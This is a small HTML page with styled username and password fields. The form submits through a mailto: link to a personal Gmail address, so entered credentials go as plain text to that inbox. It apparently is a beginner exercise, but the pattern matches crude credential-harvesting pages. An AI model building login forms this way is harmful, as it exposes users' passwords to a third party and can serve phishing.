<head>
    <style>
    body {background-color: black;
        background-image: url(https://images-wixmp-ed30a86b8c4ca887773594c2.wixmp.com/f/53d3aee0-c06b-47c9-bab5-0bb5e6ec46ce/d9piatw-35161530-18d3-4813-b4b5-728e77afdf88.jpg?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ1cm46YXBwOjdlMGQxODg5ODIyNjQzNzNhNWYwZDQxNWVhMGQyNmUwIiwiaXNzIjoidXJuOmFwcDo3ZTBkMTg4OTgyMjY0MzczYTVmMGQ0MTVlYTBkMjZlMCIsIm9iaiI6W1t7InBhdGgiOiJcL2ZcLzUzZDNhZWUwLWMwNmItNDdjOS1iYWI1LTBiYjVlNmVjNDZjZVwvZDlwaWF0dy0zNTE2MTUzMC0xOGQzLTQ4MTMtYjRiNS03MjhlNzdhZmRmODguanBnIn1dXSwiYXVkIjpbInVybjpzZXJ2aWNlOmZpbGUuZG93bmxvYWQiXX0.jf21vZrmalY9O83ta1lNO_Ho9hGK2NQdjjtxIOeClE4)}
    .usernam { 
        color: rgb(0, 0, 0);
        font-style: italic;
        font-weight: bold;
    }
    
    .passwrd { 
        color: rgb(0, 0, 0);
        font-style: italic;
        font-weight: bold;
    }
    
    </style>
    
    
    </head>
    
    
    <body>
        <form action="mailto:uzorchimedu@gmail.com" method="post" enctype="text/plain">
        <div class="usernam">
        <label for="username">Username:</label>
        <input type="text" id="username" name="username">
        <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Sofia">
    </div>
    <br>
    <div class="passwrd">
        <label for="pass">Password:</label>
        <input type="password" id="pass" name="password"
               minlength="8" required>

              <p><input type="submit" name=""></p>
    </div>
        </form>
    
    </body>